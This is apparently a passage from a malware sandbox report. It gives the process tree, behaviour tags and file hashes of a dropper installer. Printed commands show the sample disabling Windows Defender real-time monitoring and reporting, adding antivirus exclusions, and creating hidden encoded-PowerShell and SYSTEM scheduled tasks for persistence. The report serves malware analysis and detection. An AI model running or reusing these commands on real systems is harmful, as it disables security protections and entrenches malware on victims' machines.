cmd.exe 38 PID 1508 wrote to memory of 1576 1508 cmd.exe 38 PID 1508 wrote to memory of 1576 1508 cmd.exe 38 PID 1508 wrote to memory of 1576 1508 cmd.exe 38 PID 920 wrote to memory of 392 920 cmd.exe 39 PID 920 wrote to memory of 392 920 cmd.exe 39 PID 920 wrote to memory of 392 920 cmd.exe 39 PID 920 wrote to memory of 392 920 cmd.exe 39 PID 920 wrote to memory of 392 920 cmd.exe 39 PID 920 wrote to memory of 392 920 cmd.exe 39 PID 920 wrote to memory of 392 920 cmd.exe 39 PID 1508 wrote to memory of 1724 1508 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Users\Admin\AppData\Local\Temp\7zSF632.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\7zSFC0C.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:920 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:796
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:392
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1576
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1724
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gctztKeBv" /SC once /ST 07:31:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gctztKeBv"4⤵PID:624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gctztKeBv"4⤵PID:452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxLHRKpEAJQThoYlam" /SC once /ST 13:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\WMCjrFl.exe\" Xi /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1916
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E66AAD9E-58B4-4B82-BACC-EEAFB851CF00} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1352
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1956
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1144
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:856
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:664
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1168
-
C:\Windows\system32\taskeng.exetaskeng.exe {69DB194C-E5F5-4FB9-86AB-A617FC5E8F4F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\WMCjrFl.exeC:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\WMCjrFl.exe Xi /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1960 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHPVCYcxJ" /SC once /ST 06:47:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHPVCYcxJ"3⤵PID:1772
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHPVCYcxJ"3⤵PID:240
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1100
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1916
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1584
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZZCXxdZr" /SC once /ST 07:10:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZZCXxdZr"3⤵PID:1812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZZCXxdZr"3⤵PID:1544
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:323⤵PID:1272
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:643⤵PID:1476
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:323⤵PID:1524
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:643⤵PID:1916
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\BSCTWiFJDtUitSTE\STEJCRBN\LGhwcieSPXKIPLuH.wsf"3⤵PID:1552
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\BSCTWiFJDtUitSTE\STEJCRBN\LGhwcieSPXKIPLuH.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1820 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:324⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR" /t REG_DWORD /d 0 /reg:644⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:324⤵PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UscLlFnOqqRpC" /t REG_DWORD /d 0 /reg:644⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:324⤵PID:1992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxWHbdhjlhUn" /t REG_DWORD /d 0 /reg:644⤵PID:1872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:324⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dgYCiexoFJqU2" /t REG_DWORD /d 0 /reg:644⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:644⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\etvgnoeTU" /t REG_DWORD /d 0 /reg:324⤵PID:1348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:324⤵PID:1516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\gNyejqXGwyEfnHVB" /t REG_DWORD /d 0 /reg:644⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:324⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD" /t REG_DWORD /d 0 /reg:644⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:324⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:644⤵PID:2032
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gShyMwjxa" /SC once /ST 02:12:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gShyMwjxa"3⤵PID:1860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gShyMwjxa"3⤵PID:1100
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1272
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1012
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1612
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ebHKJInuomVbGemVL" /SC once /ST 10:15:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\BSCTWiFJDtUitSTE\ZGDzrYGnlTeNTtK\zxjZkXd.exe\" cu /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ebHKJInuomVbGemVL"3⤵PID:596
-
-
-
C:\Windows\Temp\BSCTWiFJDtUitSTE\ZGDzrYGnlTeNTtK\zxjZkXd.exeC:\Windows\Temp\BSCTWiFJDtUitSTE\ZGDzrYGnlTeNTtK\zxjZkXd.exe cu /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1756 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bxLHRKpEAJQThoYlam"3⤵PID:1376
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:820
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1724
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1016
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\etvgnoeTU\QMdqYz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ovXByvBxoEsnrcO" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ovXByvBxoEsnrcO2" /F /xml "C:\Program Files (x86)\etvgnoeTU\AnhvEZe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ovXByvBxoEsnrcO"3⤵PID:1996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ovXByvBxoEsnrcO"3⤵PID:724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VCUuedamaIKles" /F /xml "C:\Program Files (x86)\dgYCiexoFJqU2\DCLIRqz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WdcZyJlKMMtFI2" /F /xml "C:\ProgramData\gNyejqXGwyEfnHVB\tYSuGlO.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cwyJwQWzJDHgzLjgQ2" /F /xml "C:\Program Files (x86)\TYfpsRWDEXsxKzlEPdR\CdAKodZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:452
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1040
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1500
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1800937562-13614866591068417212-63124928520487177551543673504-13827846391430726999"1⤵PID:1736
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:680
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d7d30c48816e5545514c75dd279d002c
SHA13112445d1cc4f93b15f7119239ce94f37927c7f6
SHA256d436f7aa53dcebf7851f0fef5e2c52da783a1cc91bd2080edaa95522a3b39042
SHA51266533433a750c8d235a04b6e0f622f24298b9f64dfd9df1e2cd4aab9431a899e9009a3d3db34d0a8dc549d7f5513cda84f89fe1c9f2b6f0fe7e297c039f06251
-
Filesize
2KB
MD5e04b24c74cb8d3a8cd61e1848273e8e0
SHA1951448ad0fe9203ef36fa57b892ba25ef5b81279
SHA25668874ef3cf83c09a9170029ff85942f1d1050abe15ad996e9dde8fd05bb8256a
SHA512d7a9ce32e6bd1ab566cb9065923fbdeccfbd67fe2c2404bbaf1f9a0d5509f9c4667da56b4d0f4f886840cf21445ca8b6e825e59bc3f022e1da37cdb716ea2705
-
Filesize
2KB
MD5046a8e68405705b8c83227d3714e91a6
SHA1963b126c7bdeb85d3318c62c92b6122a3442c640
SHA25601a94cfed6428ccd047e2cf74669748b937d2e9b5da659805329241b986ee710
SHA51209a830ed21e45d80fe46de57afa0624fff293c8eb01385a2b01bb9d86dbf0b4ad893f4e4f155445c2729624c432f60f6d6ba351fa99f17d039c83b6030404011
-
Filesize
6.3MB
MD546449e5b210d669f21959406f26b3c61
SHA1ce2b8a2ad8348bf6f294d58ed2e9d5aa94b75234
